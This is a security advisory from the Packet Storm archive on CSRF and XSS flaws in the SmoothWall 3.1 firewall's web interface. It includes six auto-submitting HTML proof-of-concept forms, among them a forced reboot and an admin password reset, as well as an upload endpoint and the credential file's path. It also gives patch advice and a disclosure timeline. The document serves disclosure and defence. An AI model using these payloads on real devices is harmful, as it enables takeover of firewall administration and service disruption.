what you don't know can hurt you

SmoothWall 3.1 Cross Site Request Forgery / Cross Site Scripting

SmoothWall 3.1 Cross Site Request Forgery / Cross Site Scripting
Posted Dec 22, 2014
Authored by Yann CAM

SmoothWall version 3.1 suffers from cross site request forgery and cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss, csrf
MD5 | e453929ef60fcd0ecf00e8d7a5b5b814

SmoothWall 3.1 Cross Site Request Forgery / Cross Site Scripting

Change Mirror Download
######################################################################
# Exploit Title: SmoothWall 3.1 Multiple vulnerabilities
# Date: 21/12/2014
# Author: Yann CAM @ Synetis
# Vendor or Software Link: www.smoothwall.org - www.smoothwall.org/download/
# Version: 3.1
# Category: CSRF password reset & XSS persistent
# Google dork:
# Tested on: Smoothwall Linux distribution
######################################################################


Smoothwall firewall/router distribution description :
======================================================================

Smoothwall is a Linux distribution designed to be used as an open source firewall. Designed for ease of use, Smoothwall is configured via a web-based GUI, and requires little or no knowledge of Linux to install or use.
Smoothwall is also a private software company based in the UK that develops firewall and web content filtering software, and which also maintains the SmoothWall open source project.

In version 3.0 SP3, many XSS persistent and CSRF vulnerabilities are present (test on march 2013). Dave B has already published some XSS PoC in a January 17, 2011, which have not been corrected (exploit-db 16006).
The present advisory adds new persistent XSS vectors and PoC for a similar impact. The SmoothWall 3.1 released on october 2014, is still affected by these attack vectors.

Smoothwall webGui is simply protected by a Basic Auth (htaccess) without session token. So any page is CSRF vulnerable.
The httpd daemon listens on HTTP on port 81 and HTTPS on port 441.


Proof of Concept 1 :
======================================================================

XSS persistent through POST : affect SmoothWall 3.0SP3 and 3.1

File /httpd/cgi-bin/pppsetup.cgi line 365 :
print "\t<OPTION VALUE='$c' $selected{'PROFILE'}{$c}>$profilenames[$c]\n";

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/pppsetup.cgi' method='post'>
<input type='hidden' name='PROFILENAME' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='PROFILE' value='1' />
<input type='hidden' name='COMPORT' value='ttyS0' />
<input type='hidden' name='DTERATE' value='9600' />
<input type='hidden' name='TELEPHONE' value='' />
<input type='hidden' name='DIALMODE' value='T' />
<input type='hidden' name='MAXRETRIES' value='' />
<input type='hidden' name='TIMEOUT' value='' />
<input type='hidden' name='USERNAME' value='' />
<input type='hidden' name='PASSWORD' value='' />
<input type='hidden' name='AUTH' value='pap-or-chap' />
<input type='hidden' name='LOGINSCRIPT' value='' />
<input type='hidden' name='ACTION' value='Save' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

This XSS is persistent into the /cgi-bin/pppsetup.cgi page and /cgi-bin/logs.cgi/log.dat from these kind of lines :
File /httpd/cgi-bin/pppsetup.cgi (many occurences) :
&log("$tr{'profile deleted'} $pppsettings{'PROFILENAME'}");


Proof of Concept 2 :
======================================================================

XSS persistent through POST : affect SmoothWall 3.0SP3

File /httpd/cgi-bin/vpn.cgi/vpnconfig.dat line 258 :
<td colspan='3'><strong>$tr{'commentc'}</strong> $temp[8]</td>

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/vpn.cgi/vpnconfig.dat' method='post'>
<input type='hidden' name='SECRET1' value='x' />
<input type='hidden' name='SECRET2' value='x' />
<input type='hidden' name='COMMENT' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='ACTION' value='Add' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

Detail :
$temp[8] isn't properly sanitize before to be used. This is persistent in this page.


Proof of Concept 3 :
======================================================================

XSS persistent through POST : affect SmoothWall 3.0SP3 and 3.1

File /httpd/cgi-bin/ddns.cgi line 273 :
&displaytable($filename, \%render_settings, $cgiparams{'ORDER'}, $cgiparams{'COLUMN'} );

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/ddns.cgi' method='post'>
<input type='hidden' name='COMMENT' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='ACTION' value='Add' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

Detail :
All POST params are transmitted to the &displaytable() function without any sanitization. The COMMENT var permit a persistent XSS in this page.


Proof of Concept 4 :
======================================================================

XSS non-persistent through POST, from Dave B, not corrected since 2011. Affect SmoothWall 3.0SP3 and 3.1.

File /httpd/cgi-bin/ipinfo.cgi line 76 and 101 :
&openbox("$addr ($hostname)");

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/ipinfo.cgi' method='post'>
<input type='hidden' name='IP' value='<script>alert(/XSS from Yann CAM @ Synetis/);</script>' />
<input type='hidden' name='ACTION' value='Run' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>

Detail :
$addr isn't properly sanitize before printed in the page. This is a non-persistent XSS.

Proof of Concept 5 :
======================================================================

CSRF for reboot SmoothWall, from Dave B, not corrected since 2011. Affect SmoothWall 3.0SP3 and 3.1.

File /httpd/cgi-bin/shutdown.cgi

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/shutdown.cgi' method='post'>
<input type='hidden' name='ACTION' value='Reboot' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>


Proof of Concept 6 :
======================================================================

CSRF for change SmoothWall password admin & dial account. Affect SmoothWall 3.0SP3 and 3.1.

File /httpd/cgi-bin/changepw.cgi

At least 6 characters alnum.

PoC:

<html>
<body>
<form name='x' action='http://SMOOTHWALL_IP:81/cgi-bin/changepw.cgi' method='post'>
<input type='hidden' name='ADMIN_PASSWORD1' value='newpassword' />
<input type='hidden' name='ADMIN_PASSWORD2' value='newpassword' />
<input type='hidden' name='DIAL_PASSWORD1' value='newpassword' />
<input type='hidden' name='DIAL_PASSWORD1' value='newpassword' />
<input type='hidden' name='ACTION_DIAL' value='Save' />
<input type='hidden' name='ACTION_ADMIN' value='Save' />
</form>
<script>document.forms['x'].submit();</script>
</body>
</html>


How to prevent and protect from these vuln ?
======================================================================

For example, concerning the PoC n°1 in the file /httpd/cgi-bin/pppsetup.cgi :

To protect and prevent SmoothWall from XSS, include CGI module in the header of each vuln page (like pppsetup.cgi) :
use CGI qw(:standard);

Then, at the line 365, sanitize the $profilenames[$c] var like this :
print "\t<OPTION VALUE='$c' $selected{'PROFILE'}{$c}>" . escapeHTML($profilenames[$c]) . "\n";

And for the log page, sanitize in all file the log function call :
&log("$tr{'profile deleted'} " . escapeHTML($pppsettings{'PROFILENAME'}));

Finally, to prevent from CSRF attack, add a token mechanism on all page, or simply check the referer of each request before using POST variables (like in the IPCop firewall/router distribution, which is initially a SmoothWall fork).


Additional note :
======================================================================

It's possible to upload arbitrary file with custom content on the system. But the file is renamed to /var/smoothwall/adsl/mgmt.o.
Use the upload form here : http://SMOOTHWALL_IP:81/cgi-bin/alcateladslfw.cgi

The htpasswd file with admin & dial credentials to access webgui is located here : /var/smoothwall/auth/users


Solution:
======================================================================
2014-24-12 : None official. Users of SmoothWall need to apply patch himself.


Report timeline :
======================================================================

2013-26-03 : Team alerted with details & PoC.
2013-04-09 : Second alert sent to the team
2013-04-09 : First team response (06:00pm) who claims to have knowledge of these bugs and is not considered as issues.
2013-04-10 : Second team response (01:18am), with consideration of these vulns but, I quote : "I was told that while this is a "potential" vulnerability it requires several things to happen for this to be an actual vulnerability."
2013-04-12 : My next response, with details on "how to protect SmootWall from these vulns", and many links pointed to CSRF attacks references and considered as critical.
2014-10-11 : SmootWall 3.1 released, still affected by these issues.
2014-12-21 : Public advisory with some tips to patch manually the solution (from Dave B. advisory in january 2011 to SmoothWall 3.1 in october 2014, there was no official patches).


Additional resources :
======================================================================

- www.smoothwall.org
- www.asafety.fr
- www.exploit-db.com/exploits/16006/
- www.securecoding.cert.org/confluence/display/perl/IDS33-PL.+Sanitize+untrusted+data+passed+across+a+trust+boundary


Credits :
======================================================================
Yann CAM - Security Consultant @ ASafety

--
CONTACT: www.asafety.fr

Comments (1)

RSS Feed Subscribe to this comment feed
fest3er

These five problems are fixed in the looming 3.1 Update 2 release. It will take longer to fix in Express 3.0, but the fixes are almost identical.

These problems all require prior authentication to the Smoothwall user interface, unless there is some wizardry beyond my ken.

Thank you for finding these. The PoC HTML snippets made it easy to locate and fix the problems.

Comment by fest3er
2015-02-28 05:10:04 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

July 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    34 Files
  • 2
    Jul 2nd
    15 Files
  • 3
    Jul 3rd
    9 Files
  • 4
    Jul 4th
    8 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    3 Files
  • 7
    Jul 7th
    1 Files
  • 8
    Jul 8th
    15 Files
  • 9
    Jul 9th
    15 Files
  • 10
    Jul 10th
    20 Files
  • 11
    Jul 11th
    17 Files
  • 12
    Jul 12th
    16 Files
  • 13
    Jul 13th
    2 Files
  • 14
    Jul 14th
    1 Files
  • 15
    Jul 15th
    20 Files
  • 16
    Jul 16th
    27 Files
  • 17
    Jul 17th
    7 Files
  • 18
    Jul 18th
    5 Files
  • 19
    Jul 19th
    12 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close